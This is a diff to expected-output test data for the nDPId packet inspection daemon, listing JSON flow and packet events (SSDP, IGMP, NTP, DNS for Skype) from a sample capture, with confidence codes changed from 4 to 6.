00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACh3hQAAAERKXPAqAEi7\/\/\/+t42B2wAjVUWTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2594,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACg2\/EAAAERK5fAqAEi7\/\/\/+t42B2wAjLsJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChjL0AAAEResrAqAEi7\/\/\/+vwwB2wAjTccTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2596,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgyNwAAAERPqzAqAEi7\/\/\/+vwwB2wAjJ0PTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969745776,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoljUAAEARYRzAqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} 
@@ -1024,10 +1024,10 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"} 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1431969751302,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":1431969751302,"pkt":"AQBeAAAB0NQSxnP1CABGwAAkAABAAAECQmnAqAEB4AAAAZQEAAARZOweAAAAAAJ9AAAAAAAAAAAAAAAA"} 
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1431969759543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759543,"pkt":"0NQSxnP1PBXCt3IOCABFwABMl\/4AAEAR3SbAqAEiEf0w9QB7AHsAOFSa4wIG7AAAChwAAPSnEf0w9dkEndkb+ycx2QSd2Rb0\/7nZBJ3ZG\/snMdkEnl+LA3WC"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2763,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1431969759588,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759588,"pkt":"PBXCt3IO0NQSxnP1CABFAABMAABAADgRPeUR\/TD1wKgBIgB7AHsAOA1EJAEG7AAAAAAAAAAMR1BTc9kEnl2e8n962QSeX4sDdYLZBJ5fkbdSxdkEnl+RubQR"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} 
@@ -1070,7 +1070,7 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"} 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1431969789851,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969789851,"pkt":"AQBeAAD7PBXCt3IOCABGAAAgDOsAAAECdSfAqAEi4AAA+5QEAAAWAAkE4AAA+w=="} 
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -1086,7 +1086,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1431969793871,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969793871,"pkt":"0NQSxnP1PBXCt3IOCABFAAA68cwAAEARBXPAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3236,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1431969794907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969794907,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ITcAAEAR1gjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3239,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1431969796001,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969796001,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6focAAEAReLjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 
@@ -1107,7 +1107,7 @@ 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 